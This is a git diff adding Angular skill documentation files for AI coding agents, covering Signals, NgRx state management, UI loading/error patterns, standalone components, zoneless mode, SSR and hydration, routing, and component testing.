- **Signal-based Services** - Lightweight state for shared data
|
||||
- **NgRx SignalStore** - Feature-scoped state with computed values
|
||||
- **NgRx Store** - Enterprise-scale global state management
|
||||
- **RxJS ComponentStore** - Reactive component-level state
|
||||
- **Forms State** - Reactive and template-driven form patterns
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file is organized into:
|
||||
|
||||
1. **State Categories** - Local, shared, global, server, URL, and form state
|
||||
2. **Selection Criteria** - Decision trees for choosing the right solution
|
||||
3. **Implementation Patterns** - Complete examples for each approach
|
||||
4. **Migration Guides** - Moving from BehaviorSubject to Signals
|
||||
5. **Bridging Patterns** - Integrating Signals with RxJS
|
||||
|
||||
## When to Use Each Pattern
|
||||
|
||||
- **Signal Service**: Shared UI state (theme, user preferences)
|
||||
- **NgRx SignalStore**: Feature state with computed values
|
||||
- **NgRx Store**: Complex cross-feature dependencies
|
||||
- **ComponentStore**: Component-scoped async operations
|
||||
- **Reactive Forms**: Form state with validation
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular Signals](https://angular.dev/guide/signals)
|
||||
- [NgRx](https://ngrx.io)
|
||||
- [NgRx SignalStore](https://ngrx.io/guide/signals)
|
||||
@@ -3,6 +3,7 @@ name: angular-state-management
|
||||
description: "Master modern Angular state management with Signals, NgRx, and RxJS. Use when setting up global state, managing component stores, choosing between state solutions, or migrating from legacy patterns."
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular State Management
|
||||
|
||||
13
web-app/public/skills/angular-state-management/metadata.json
Normal file
13
web-app/public/skills/angular-state-management/metadata.json
Normal file
@@ -0,0 +1,13 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Complete state management guide for Angular applications designed for AI agents and LLMs. Covers Signal-based services, NgRx for global state, RxJS patterns, and component stores. Includes decision trees for choosing the right solution, migration patterns from BehaviorSubject to Signals, and strategies for bridging Signals with RxJS observables.",
|
||||
"references": [
|
||||
"https://angular.dev/guide/signals",
|
||||
"https://ngrx.io",
|
||||
"https://ngrx.io/guide/signals",
|
||||
"https://www.rx-angular.io",
|
||||
"https://github.com/ngrx/platform"
|
||||
]
|
||||
}
|
||||
55
web-app/public/skills/angular-ui-patterns/README.md
Normal file
55
web-app/public/skills/angular-ui-patterns/README.md
Normal file
@@ -0,0 +1,55 @@
|
||||
# Angular UI Patterns
|
||||
|
||||
Modern UI patterns for building robust Angular applications optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill covers essential UI patterns for:
|
||||
|
||||
- **Loading States** - Skeleton vs spinner decision trees
|
||||
- **Error Handling** - Error boundary hierarchy and recovery
|
||||
- **Progressive Disclosure** - Using `@defer` for lazy rendering
|
||||
- **Data Display** - Handling empty, loading, and error states
|
||||
- **Form Patterns** - Submission states and validation feedback
|
||||
- **Dialog/Modal Patterns** - Proper dialog lifecycle management
|
||||
|
||||
## Core Principles
|
||||
|
||||
1. **Never show stale UI** - Only show loading when no data exists
|
||||
2. **Surface all errors** - Never silently fail
|
||||
3. **Optimistic updates** - Update UI before server confirms
|
||||
4. **Progressive disclosure** - Use `@defer` to load non-critical content
|
||||
5. **Graceful degradation** - Fallback for failed features
|
||||
|
||||
## Structure
|
||||
|
||||
The `SKILL.md` file includes:
|
||||
|
||||
1. **Golden Rules** - Non-negotiable patterns to follow
|
||||
2. **Decision Trees** - When to use skeleton vs spinner
|
||||
3. **Code Examples** - Correct vs incorrect implementations
|
||||
4. **Anti-patterns** - Common mistakes to avoid
|
||||
|
||||
## Quick Reference
|
||||
|
||||
```html
|
||||
<!-- Angular template pattern for data states -->
|
||||
@if (error()) {
|
||||
<app-error-state [error]="error()" (retry)="load()" />
|
||||
} @else if (loading() && !data()) {
|
||||
<app-skeleton-state />
|
||||
} @else if (!data()?.length) {
|
||||
<app-empty-state message="No items found" />
|
||||
} @else {
|
||||
<app-data-display [data]="data()" />
|
||||
}
|
||||
```
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular @defer](https://angular.dev/guide/defer)
|
||||
- [Angular Templates](https://angular.dev/guide/templates)
|
||||
@@ -3,6 +3,7 @@ name: angular-ui-patterns
|
||||
description: "Modern Angular UI patterns for loading states, error handling, and data display. Use when building UI components, handling async data, or managing component states."
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Angular UI Patterns
|
||||
|
||||
12
web-app/public/skills/angular-ui-patterns/metadata.json
Normal file
12
web-app/public/skills/angular-ui-patterns/metadata.json
Normal file
@@ -0,0 +1,12 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Modern UI patterns for Angular applications designed for AI agents and LLMs. Covers loading states, error handling, progressive disclosure, and data display patterns. Emphasizes showing loading only without data, surfacing all errors, optimistic updates, and graceful degradation using @defer. Includes decision trees and anti-patterns to avoid.",
|
||||
"references": [
|
||||
"https://angular.dev/guide/defer",
|
||||
"https://angular.dev/guide/templates",
|
||||
"https://material.angular.io",
|
||||
"https://ng-spartan.com"
|
||||
]
|
||||
}
|
||||
40
web-app/public/skills/angular/README.md
Normal file
40
web-app/public/skills/angular/README.md
Normal file
@@ -0,0 +1,40 @@
|
||||
# Angular
|
||||
|
||||
A comprehensive guide to modern Angular development (v20+) optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill covers modern Angular patterns including:
|
||||
|
||||
- **Signals** - Angular's reactive primitive for state management
|
||||
- **Standalone Components** - Modern component architecture without NgModules
|
||||
- **Zoneless Applications** - High-performance apps without Zone.js
|
||||
- **SSR & Hydration** - Server-side rendering and client hydration patterns
|
||||
- **Modern Routing** - Functional guards, resolvers, and lazy loading
|
||||
- **Dependency Injection** - Modern DI with `inject()` function
|
||||
- **Reactive Forms** - Type-safe form handling
|
||||
|
||||
## Structure
|
||||
|
||||
This skill is a single, comprehensive `SKILL.md` file containing:
|
||||
|
||||
1. Modern component patterns with Signal inputs/outputs
|
||||
2. State management with Signals and computed values
|
||||
3. Performance optimization techniques
|
||||
4. SSR and hydration best practices
|
||||
5. Migration strategies from legacy Angular patterns
|
||||
|
||||
## Usage
|
||||
|
||||
This skill is designed to be read in full to understand the complete modern Angular development approach, or referenced for specific patterns when needed.
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular Documentation](https://angular.dev)
|
||||
- [Angular Signals](https://angular.dev/guide/signals)
|
||||
- [Zoneless Angular](https://angular.dev/guide/zoneless)
|
||||
- [Angular SSR](https://angular.dev/guide/ssr)
|
||||
818
web-app/public/skills/angular/SKILL.md
Normal file
818
web-app/public/skills/angular/SKILL.md
Normal file
@@ -0,0 +1,818 @@
|
||||
---
|
||||
name: angular
|
||||
description: Modern Angular (v20+) expert with deep knowledge of Signals, Standalone Components, Zoneless applications, SSR/Hydration, and reactive patterns.
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# Angular Expert
|
||||
|
||||
Master modern Angular development with Signals, Standalone Components, Zoneless applications, SSR/Hydration, and the latest reactive patterns.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Building new Angular applications (v20+)
|
||||
- Implementing Signals-based reactive patterns
|
||||
- Creating Standalone Components and migrating from NgModules
|
||||
- Configuring Zoneless Angular applications
|
||||
- Implementing SSR, prerendering, and hydration
|
||||
- Optimizing Angular performance
|
||||
- Adopting modern Angular patterns and best practices
|
||||
|
||||
## Do Not Use This Skill When
|
||||
|
||||
- Migrating from AngularJS (1.x) → use `angular-migration` skill
|
||||
- Working with legacy Angular apps that cannot upgrade
|
||||
- General TypeScript issues → use `typescript-expert` skill
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Assess the Angular version and project structure
|
||||
2. Apply modern patterns (Signals, Standalone, Zoneless)
|
||||
3. Implement with proper typing and reactivity
|
||||
4. Validate with build and tests
|
||||
|
||||
## Safety
|
||||
|
||||
- Always test changes in development before production
|
||||
- Gradual migration for existing apps (don't big-bang refactor)
|
||||
- Keep backward compatibility during transitions
|
||||
|
||||
---
|
||||
|
||||
## Angular Version Timeline
|
||||
|
||||
| Version | Release | Key Features |
|
||||
| -------------- | ------- | ------------------------------------------------------ |
|
||||
| **Angular 20** | Q2 2025 | Signals stable, Zoneless stable, Incremental hydration |
|
||||
| **Angular 21** | Q4 2025 | Signals-first default, Enhanced SSR |
|
||||
| **Angular 22** | Q2 2026 | Signal Forms, Selectorless components |
|
||||
|
||||
---
|
||||
|
||||
## 1. Signals: The New Reactive Primitive
|
||||
|
||||
Signals are Angular's fine-grained reactivity system, replacing zone.js-based change detection.
|
||||
|
||||
### Core Concepts
|
||||
|
||||
```typescript
|
||||
import { signal, computed, effect } from "@angular/core";
|
||||
|
||||
// Writable signal
|
||||
const count = signal(0);
|
||||
|
||||
// Read value
|
||||
console.log(count()); // 0
|
||||
|
||||
// Update value
|
||||
count.set(5); // Direct set
|
||||
count.update((v) => v + 1); // Functional update
|
||||
|
||||
// Computed (derived) signal
|
||||
const doubled = computed(() => count() * 2);
|
||||
|
||||
// Effect (side effects)
|
||||
effect(() => {
|
||||
console.log(`Count changed to: ${count()}`);
|
||||
});
|
||||
```
|
||||
|
||||
### Signal-Based Inputs and Outputs
|
||||
|
||||
```typescript
|
||||
import { Component, input, output, model } from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-user-card",
|
||||
standalone: true,
|
||||
template: `
|
||||
<div class="card">
|
||||
<h3>{{ name() }}</h3>
|
||||
<span>{{ role() }}</span>
|
||||
<button (click)="select.emit(id())">Select</button>
|
||||
</div>
|
||||
`,
|
||||
})
|
||||
export class UserCardComponent {
|
||||
// Signal inputs (read-only)
|
||||
id = input.required<string>();
|
||||
name = input.required<string>();
|
||||
role = input<string>("User"); // With default
|
||||
|
||||
// Output
|
||||
select = output<string>();
|
||||
|
||||
// Two-way binding (model)
|
||||
isSelected = model(false);
|
||||
}
|
||||
|
||||
// Usage:
|
||||
// <app-user-card [id]="'123'" [name]="'John'" [(isSelected)]="selected" />
|
||||
```
|
||||
|
||||
### Signal Queries (ViewChild/ContentChild)
|
||||
|
||||
```typescript
|
||||
import {
|
||||
Component,
|
||||
viewChild,
|
||||
viewChildren,
|
||||
contentChild,
|
||||
} from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-container",
|
||||
standalone: true,
|
||||
template: `
|
||||
<input #searchInput />
|
||||
<app-item *ngFor="let item of items()" />
|
||||
`,
|
||||
})
|
||||
export class ContainerComponent {
|
||||
// Signal-based queries
|
||||
searchInput = viewChild<ElementRef>("searchInput");
|
||||
items = viewChildren(ItemComponent);
|
||||
projectedContent = contentChild(HeaderDirective);
|
||||
|
||||
focusSearch() {
|
||||
this.searchInput()?.nativeElement.focus();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### When to Use Signals vs RxJS
|
||||
|
||||
| Use Case | Signals | RxJS |
|
||||
| ----------------------- | --------------- | -------------------------------- |
|
||||
| Local component state | ✅ Preferred | Overkill |
|
||||
| Derived/computed values | ✅ `computed()` | `combineLatest` works |
|
||||
| Side effects | ✅ `effect()` | `tap` operator |
|
||||
| HTTP requests | ❌ | ✅ HttpClient returns Observable |
|
||||
| Event streams | ❌ | ✅ `fromEvent`, operators |
|
||||
| Complex async flows | ❌ | ✅ `switchMap`, `mergeMap` |
|
||||
|
||||
---
|
||||
|
||||
## 2. Standalone Components
|
||||
|
||||
Standalone components are self-contained and don't require NgModule declarations.
|
||||
|
||||
### Creating Standalone Components
|
||||
|
||||
```typescript
|
||||
import { Component } from "@angular/core";
|
||||
import { CommonModule } from "@angular/common";
|
||||
import { RouterLink } from "@angular/router";
|
||||
|
||||
@Component({
|
||||
selector: "app-header",
|
||||
standalone: true,
|
||||
imports: [CommonModule, RouterLink], // Direct imports
|
||||
template: `
|
||||
<header>
|
||||
<a routerLink="/">Home</a>
|
||||
<a routerLink="/about">About</a>
|
||||
</header>
|
||||
`,
|
||||
})
|
||||
export class HeaderComponent {}
|
||||
```
|
||||
|
||||
### Bootstrapping Without NgModule
|
||||
|
||||
```typescript
|
||||
// main.ts
|
||||
import { bootstrapApplication } from "@angular/platform-browser";
|
||||
import { provideRouter } from "@angular/router";
|
||||
import { provideHttpClient } from "@angular/common/http";
|
||||
import { AppComponent } from "./app/app.component";
|
||||
import { routes } from "./app/app.routes";
|
||||
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [provideRouter(routes), provideHttpClient()],
|
||||
});
|
||||
```
|
||||
|
||||
### Lazy Loading Standalone Components
|
||||
|
||||
```typescript
|
||||
// app.routes.ts
|
||||
import { Routes } from "@angular/router";
|
||||
|
||||
export const routes: Routes = [
|
||||
{
|
||||
path: "dashboard",
|
||||
loadComponent: () =>
|
||||
import("./dashboard/dashboard.component").then(
|
||||
(m) => m.DashboardComponent,
|
||||
),
|
||||
},
|
||||
{
|
||||
path: "admin",
|
||||
loadChildren: () =>
|
||||
import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
|
||||
},
|
||||
];
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Zoneless Angular
|
||||
|
||||
Zoneless applications don't use zone.js, improving performance and debugging.
|
||||
|
||||
### Enabling Zoneless Mode
|
||||
|
||||
```typescript
|
||||
// main.ts
|
||||
import { bootstrapApplication } from "@angular/platform-browser";
|
||||
import { provideZonelessChangeDetection } from "@angular/core";
|
||||
import { AppComponent } from "./app/app.component";
|
||||
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [provideZonelessChangeDetection()],
|
||||
});
|
||||
```
|
||||
|
||||
### Zoneless Component Patterns
|
||||
|
||||
```typescript
|
||||
import { Component, signal, ChangeDetectionStrategy } from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-counter",
|
||||
standalone: true,
|
||||
changeDetection: ChangeDetectionStrategy.OnPush,
|
||||
template: `
|
||||
<div>Count: {{ count() }}</div>
|
||||
<button (click)="increment()">+</button>
|
||||
`,
|
||||
})
|
||||
export class CounterComponent {
|
||||
count = signal(0);
|
||||
|
||||
increment() {
|
||||
this.count.update((v) => v + 1);
|
||||
// No zone.js needed - Signal triggers change detection
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Key Zoneless Benefits
|
||||
|
||||
- **Performance**: No zone.js patches on async APIs
|
||||
- **Debugging**: Clean stack traces without zone wrappers
|
||||
- **Bundle size**: Smaller without zone.js (~15KB savings)
|
||||
- **Interoperability**: Better with Web Components and micro-frontends
|
||||
|
||||
---
|
||||
|
||||
## 4. Server-Side Rendering & Hydration
|
||||
|
||||
### SSR Setup with Angular CLI
|
||||
|
||||
```bash
|
||||
ng add @angular/ssr
|
||||
```
|
||||
|
||||
### Hydration Configuration
|
||||
|
||||
```typescript
|
||||
// app.config.ts
|
||||
import { ApplicationConfig } from "@angular/core";
|
||||
import {
|
||||
provideClientHydration,
|
||||
withEventReplay,
|
||||
} from "@angular/platform-browser";
|
||||
|
||||
export const appConfig: ApplicationConfig = {
|
||||
providers: [provideClientHydration(withEventReplay())],
|
||||
};
|
||||
```
|
||||
|
||||
### Incremental Hydration (v20+)
|
||||
|
||||
```typescript
|
||||
import { Component } from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-page",
|
||||
standalone: true,
|
||||
template: `
|
||||
<app-hero />
|
||||
|
||||
@defer (hydrate on viewport) {
|
||||
<app-comments />
|
||||
}
|
||||
|
||||
@defer (hydrate on interaction) {
|
||||
<app-chat-widget />
|
||||
}
|
||||
`,
|
||||
})
|
||||
export class PageComponent {}
|
||||
```
|
||||
|
||||
### Hydration Triggers
|
||||
|
||||
| Trigger | When to Use |
|
||||
| ---------------- | --------------------------------------- |
|
||||
| `on idle` | Low-priority, hydrate when browser idle |
|
||||
| `on viewport` | Hydrate when element enters viewport |
|
||||
| `on interaction` | Hydrate on first user interaction |
|
||||
| `on hover` | Hydrate when user hovers |
|
||||
| `on timer(ms)` | Hydrate after specified delay |
|
||||
|
||||
---
|
||||
|
||||
## 5. Modern Routing Patterns
|
||||
|
||||
### Functional Route Guards
|
||||
|
||||
```typescript
|
||||
// auth.guard.ts
|
||||
import { inject } from "@angular/core";
|
||||
import { Router, CanActivateFn } from "@angular/router";
|
||||
import { AuthService } from "./auth.service";
|
||||
|
||||
export const authGuard: CanActivateFn = (route, state) => {
|
||||
const auth = inject(AuthService);
|
||||
const router = inject(Router);
|
||||
|
||||
if (auth.isAuthenticated()) {
|
||||
return true;
|
||||
}
|
||||
|
||||
return router.createUrlTree(["/login"], {
|
||||
queryParams: { returnUrl: state.url },
|
||||
});
|
||||
};
|
||||
|
||||
// Usage in routes
|
||||
export const routes: Routes = [
|
||||
{
|
||||
path: "dashboard",
|
||||
loadComponent: () => import("./dashboard.component"),
|
||||
canActivate: [authGuard],
|
||||
},
|
||||
];
|
||||
```
|
||||
|
||||
### Route-Level Data Resolvers
|
||||
|
||||
```typescript
|
||||
import { inject } from '@angular/core';
|
||||
import { ResolveFn } from '@angular/router';
|
||||
import { UserService } from './user.service';
|
||||
import { User } from './user.model';
|
||||
|
||||
export const userResolver: ResolveFn<User> = (route) => {
|
||||
const userService = inject(UserService);
|
||||
return userService.getUser(route.paramMap.get('id')!);
|
||||
};
|
||||
|
||||
// In routes
|
||||
{
|
||||
path: 'user/:id',
|
||||
loadComponent: () => import('./user.component'),
|
||||
resolve: { user: userResolver }
|
||||
}
|
||||
|
||||
// In component
|
||||
export class UserComponent {
|
||||
private route = inject(ActivatedRoute);
|
||||
user = toSignal(this.route.data.pipe(map(d => d['user'])));
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Dependency Injection Patterns
|
||||
|
||||
### Modern inject() Function
|
||||
|
||||
```typescript
|
||||
import { Component, inject } from '@angular/core';
|
||||
import { HttpClient } from '@angular/common/http';
|
||||
import { UserService } from './user.service';
|
||||
|
||||
@Component({...})
|
||||
export class UserComponent {
|
||||
// Modern inject() - no constructor needed
|
||||
private http = inject(HttpClient);
|
||||
private userService = inject(UserService);
|
||||
|
||||
// Works in any injection context
|
||||
users = toSignal(this.userService.getUsers());
|
||||
}
|
||||
```
|
||||
|
||||
### Injection Tokens for Configuration
|
||||
|
||||
```typescript
|
||||
import { InjectionToken, inject } from "@angular/core";
|
||||
|
||||
// Define token
|
||||
export const API_BASE_URL = new InjectionToken<string>("API_BASE_URL");
|
||||
|
||||
// Provide in config
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [{ provide: API_BASE_URL, useValue: "https://api.example.com" }],
|
||||
});
|
||||
|
||||
// Inject in service
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class ApiService {
|
||||
private baseUrl = inject(API_BASE_URL);
|
||||
|
||||
get(endpoint: string) {
|
||||
return this.http.get(`${this.baseUrl}/${endpoint}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Component Composition & Reusability
|
||||
|
||||
### Content Projection (Slots)
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
selector: 'app-card',
|
||||
template: `
|
||||
<div class="card">
|
||||
<div class="header">
|
||||
<!-- Select by attribute -->
|
||||
<ng-content select="[card-header]"></ng-content>
|
||||
</div>
|
||||
<div class="body">
|
||||
<!-- Default slot -->
|
||||
<ng-content></ng-content>
|
||||
</div>
|
||||
</div>
|
||||
`
|
||||
})
|
||||
export class CardComponent {}
|
||||
|
||||
// Usage
|
||||
<app-card>
|
||||
<h3 card-header>Title</h3>
|
||||
<p>Body content</p>
|
||||
</app-card>
|
||||
```
|
||||
|
||||
### Host Directives (Composition)
|
||||
|
||||
```typescript
|
||||
// Reusable behaviors without inheritance
|
||||
@Directive({
|
||||
standalone: true,
|
||||
selector: '[appTooltip]',
|
||||
inputs: ['tooltip'] // Signal input alias
|
||||
})
|
||||
export class TooltipDirective { ... }
|
||||
|
||||
@Component({
|
||||
selector: 'app-button',
|
||||
standalone: true,
|
||||
hostDirectives: [
|
||||
{
|
||||
directive: TooltipDirective,
|
||||
inputs: ['tooltip: title'] // Map input
|
||||
}
|
||||
],
|
||||
template: `<ng-content />`
|
||||
})
|
||||
export class ButtonComponent {}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. State Management Patterns
|
||||
|
||||
### Signal-Based State Service
|
||||
|
||||
```typescript
|
||||
import { Injectable, signal, computed } from "@angular/core";
|
||||
|
||||
interface AppState {
|
||||
user: User | null;
|
||||
theme: "light" | "dark";
|
||||
notifications: Notification[];
|
||||
}
|
||||
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class StateService {
|
||||
// Private writable signals
|
||||
private _user = signal<User | null>(null);
|
||||
private _theme = signal<"light" | "dark">("light");
|
||||
private _notifications = signal<Notification[]>([]);
|
||||
|
||||
// Public read-only computed
|
||||
readonly user = computed(() => this._user());
|
||||
readonly theme = computed(() => this._theme());
|
||||
readonly notifications = computed(() => this._notifications());
|
||||
readonly unreadCount = computed(
|
||||
() => this._notifications().filter((n) => !n.read).length,
|
||||
);
|
||||
|
||||
// Actions
|
||||
setUser(user: User | null) {
|
||||
this._user.set(user);
|
||||
}
|
||||
|
||||
toggleTheme() {
|
||||
this._theme.update((t) => (t === "light" ? "dark" : "light"));
|
||||
}
|
||||
|
||||
addNotification(notification: Notification) {
|
||||
this._notifications.update((n) => [...n, notification]);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Component Store Pattern with Signals
|
||||
|
||||
```typescript
|
||||
import { Injectable, signal, computed, inject } from "@angular/core";
|
||||
import { HttpClient } from "@angular/common/http";
|
||||
import { toSignal } from "@angular/core/rxjs-interop";
|
||||
|
||||
@Injectable()
|
||||
export class ProductStore {
|
||||
private http = inject(HttpClient);
|
||||
|
||||
// State
|
||||
private _products = signal<Product[]>([]);
|
||||
private _loading = signal(false);
|
||||
private _filter = signal("");
|
||||
|
||||
// Selectors
|
||||
readonly products = computed(() => this._products());
|
||||
readonly loading = computed(() => this._loading());
|
||||
readonly filteredProducts = computed(() => {
|
||||
const filter = this._filter().toLowerCase();
|
||||
return this._products().filter((p) =>
|
||||
p.name.toLowerCase().includes(filter),
|
||||
);
|
||||
});
|
||||
|
||||
// Actions
|
||||
loadProducts() {
|
||||
this._loading.set(true);
|
||||
this.http.get<Product[]>("/api/products").subscribe({
|
||||
next: (products) => {
|
||||
this._products.set(products);
|
||||
this._loading.set(false);
|
||||
},
|
||||
error: () => this._loading.set(false),
|
||||
});
|
||||
}
|
||||
|
||||
setFilter(filter: string) {
|
||||
this._filter.set(filter);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Forms with Signals (Coming in v22+)
|
||||
|
||||
### Current Reactive Forms
|
||||
|
||||
```typescript
|
||||
import { Component, inject } from "@angular/core";
|
||||
import { FormBuilder, Validators, ReactiveFormsModule } from "@angular/forms";
|
||||
|
||||
@Component({
|
||||
selector: "app-user-form",
|
||||
standalone: true,
|
||||
imports: [ReactiveFormsModule],
|
||||
template: `
|
||||
<form [formGroup]="form" (ngSubmit)="onSubmit()">
|
||||
<input formControlName="name" placeholder="Name" />
|
||||
<input formControlName="email" type="email" placeholder="Email" />
|
||||
<button [disabled]="form.invalid">Submit</button>
|
||||
</form>
|
||||
`,
|
||||
})
|
||||
export class UserFormComponent {
|
||||
private fb = inject(FormBuilder);
|
||||
|
||||
form = this.fb.group({
|
||||
name: ["", Validators.required],
|
||||
email: ["", [Validators.required, Validators.email]],
|
||||
});
|
||||
|
||||
onSubmit() {
|
||||
if (this.form.valid) {
|
||||
console.log(this.form.value);
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Signal-Aware Form Patterns (Preview)
|
||||
|
||||
```typescript
|
||||
// Future Signal Forms API (experimental)
|
||||
import { Component, signal } from '@angular/core';
|
||||
|
||||
@Component({...})
|
||||
export class SignalFormComponent {
|
||||
name = signal('');
|
||||
email = signal('');
|
||||
|
||||
// Computed validation
|
||||
isValid = computed(() =>
|
||||
this.name().length > 0 &&
|
||||
this.email().includes('@')
|
||||
);
|
||||
|
||||
submit() {
|
||||
if (this.isValid()) {
|
||||
console.log({ name: this.name(), email: this.email() });
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 10. Performance Optimization
|
||||
|
||||
### Change Detection Strategies
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
changeDetection: ChangeDetectionStrategy.OnPush,
|
||||
// Only checks when:
|
||||
// 1. Input signal/reference changes
|
||||
// 2. Event handler runs
|
||||
// 3. Async pipe emits
|
||||
// 4. Signal value changes
|
||||
})
|
||||
```
|
||||
|
||||
### Defer Blocks for Lazy Loading
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
template: `
|
||||
<!-- Immediate loading -->
|
||||
<app-header />
|
||||
|
||||
<!-- Lazy load when visible -->
|
||||
@defer (on viewport) {
|
||||
<app-heavy-chart />
|
||||
} @placeholder {
|
||||
<div class="skeleton" />
|
||||
} @loading (minimum 200ms) {
|
||||
<app-spinner />
|
||||
} @error {
|
||||
<p>Failed to load chart</p>
|
||||
}
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
### NgOptimizedImage
|
||||
|
||||
```typescript
|
||||
import { NgOptimizedImage } from '@angular/common';
|
||||
|
||||
@Component({
|
||||
imports: [NgOptimizedImage],
|
||||
template: `
|
||||
<img
|
||||
ngSrc="hero.jpg"
|
||||
width="800"
|
||||
height="600"
|
||||
priority
|
||||
/>
|
||||
|
||||
<img
|
||||
ngSrc="thumbnail.jpg"
|
||||
width="200"
|
||||
height="150"
|
||||
loading="lazy"
|
||||
placeholder="blur"
|
||||
/>
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 11. Testing Modern Angular
|
||||
|
||||
### Testing Signal Components
|
||||
|
||||
```typescript
|
||||
import { ComponentFixture, TestBed } from "@angular/core/testing";
|
||||
import { CounterComponent } from "./counter.component";
|
||||
|
||||
describe("CounterComponent", () => {
|
||||
let component: CounterComponent;
|
||||
let fixture: ComponentFixture<CounterComponent>;
|
||||
|
||||
beforeEach(async () => {
|
||||
await TestBed.configureTestingModule({
|
||||
imports: [CounterComponent], // Standalone import
|
||||
}).compileComponents();
|
||||
|
||||
fixture = TestBed.createComponent(CounterComponent);
|
||||
component = fixture.componentInstance;
|
||||
fixture.detectChanges();
|
||||
});
|
||||
|
||||
it("should increment count", () => {
|
||||
expect(component.count()).toBe(0);
|
||||
|
||||
component.increment();
|
||||
|
||||
expect(component.count()).toBe(1);
|
||||
});
|
||||
|
||||
it("should update DOM on signal change", () => {
|
||||
component.count.set(5);
|
||||
fixture.detectChanges();
|
||||
|
||||
const el = fixture.nativeElement.querySelector(".count");
|
||||
expect(el.textContent).toContain("5");
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
### Testing with Signal Inputs
|
||||
|
||||
```typescript
|
||||
import { ComponentFixture, TestBed } from "@angular/core/testing";
|
||||
import { ComponentRef } from "@angular/core";
|
||||
import { UserCardComponent } from "./user-card.component";
|
||||
|
||||
describe("UserCardComponent", () => {
|
||||
let fixture: ComponentFixture<UserCardComponent>;
|
||||
let componentRef: ComponentRef<UserCardComponent>;
|
||||
|
||||
beforeEach(async () => {
|
||||
await TestBed.configureTestingModule({
|
||||
imports: [UserCardComponent],
|
||||
}).compileComponents();
|
||||
|
||||
fixture = TestBed.createComponent(UserCardComponent);
|
||||
componentRef = fixture.componentRef;
|
||||
|
||||
// Set signal inputs via setInput
|
||||
componentRef.setInput("id", "123");
|
||||
componentRef.setInput("name", "John Doe");
|
||||
|
||||
fixture.detectChanges();
|
||||
});
|
||||
|
||||
it("should display user name", () => {
|
||||
const el = fixture.nativeElement.querySelector("h3");
|
||||
expect(el.textContent).toContain("John Doe");
|
||||
});
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Best Practices Summary
|
||||
|
||||
| Pattern | ✅ Do | ❌ Don't |
|
||||
| -------------------- | ------------------------------ | ------------------------------- |
|
||||
| **State** | Use Signals for local state | Overuse RxJS for simple state |
|
||||
| **Components** | Standalone with direct imports | Bloated SharedModules |
|
||||
| **Change Detection** | OnPush + Signals | Default CD everywhere |
|
||||
| **Lazy Loading** | `@defer` and `loadComponent` | Eager load everything |
|
||||
| **DI** | `inject()` function | Constructor injection (verbose) |
|
||||
| **Inputs** | `input()` signal function | `@Input()` decorator (legacy) |
|
||||
| **Zoneless** | Enable for new projects | Force on legacy without testing |
|
||||
|
||||
---
|
||||
|
||||
## Resources
|
||||
|
||||
- [Angular.dev Documentation](https://angular.dev)
|
||||
- [Angular Signals Guide](https://angular.dev/guide/signals)
|
||||
- [Angular SSR Guide](https://angular.dev/guide/ssr)
|
||||
- [Angular Update Guide](https://angular.dev/update-guide)
|
||||
- [Angular Blog](https://blog.angular.dev)
|
||||
|
||||
---
|
||||
|
||||
## Common Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
| ------------------------------ | --------------------------------------------------- |
|
||||
| Signal not updating UI | Ensure `OnPush` + call signal as function `count()` |
|
||||
| Hydration mismatch | Check server/client content consistency |
|
||||
| Circular dependency | Use `inject()` with `forwardRef` |
|
||||
| Zoneless not detecting changes | Trigger via signal updates, not mutations |
|
||||
